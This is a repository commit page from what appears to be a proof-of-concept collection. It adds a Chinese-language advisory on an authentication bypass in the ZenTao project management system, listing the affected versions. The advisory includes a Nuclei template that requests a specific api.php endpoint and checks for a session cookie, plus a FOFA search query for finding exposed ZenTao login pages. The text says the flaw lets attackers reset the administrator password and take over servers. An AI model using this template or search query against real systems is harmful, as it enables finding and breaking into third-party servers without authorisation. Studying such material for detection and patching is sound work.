admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 禅道项目管理系统身份认证绕过漏洞.md

Browse Source
This commit is contained in:
wy876 2024-04-26 22:26:59 +08:00 committed by GitHub
parent c30487337e
commit 59342eef0c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 45 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

45
禅道项目管理系统身份认证绕过漏洞.md Normal file
View File

@ -0,0 +1,45 @@
## 禅道项目管理系统身份认证绕过漏洞
禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后就可以实现完全接管服务器。
## 影响版本
```
16.x <= 禅道项目管理系统< 18.12开源版
6.x <= 禅道项目管理系统< 8.12企业版
3.x <= 禅道项目管理系统< 4.12旗舰版
```
## poc
```
id: easycorp-zentao-pms-idor
info:
name: 禅道项目管理系统身份认证绕过漏洞
author: GuoRong_X
severity: critical
description: |
- 禅道系统某些API设计为通过特定的鉴权函数进行验证但在实际实现中这个鉴权函数在鉴权失败后并不中断请求而是仅返回一个错误标志这个返回值在后续没有被适当处理。此外该系统在处理某些API时未能有效检查用户身份允许未认证的用户执行某些操作从而绕过鉴权机制。
reference:
- https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw
metadata:
verified: true
fofa-query: title="用户登录- 禅道"
tags: zentao
http:
- method: GET
path:
- "{{BaseURL}}/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu"
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie: zentaosid='
- type: status
status:
- 200
# digest: 4a0a0047304502200b7a7cb58af457a9e566160cfdc539a99325db1513d5e4172a9a0a66f2f44e63022100fe0cc4ffd848c733eba3240bf102695253caa1420845a2b8aec5ca731e394759:58d4ffcb61df0489d6ab2fd018c17de6
```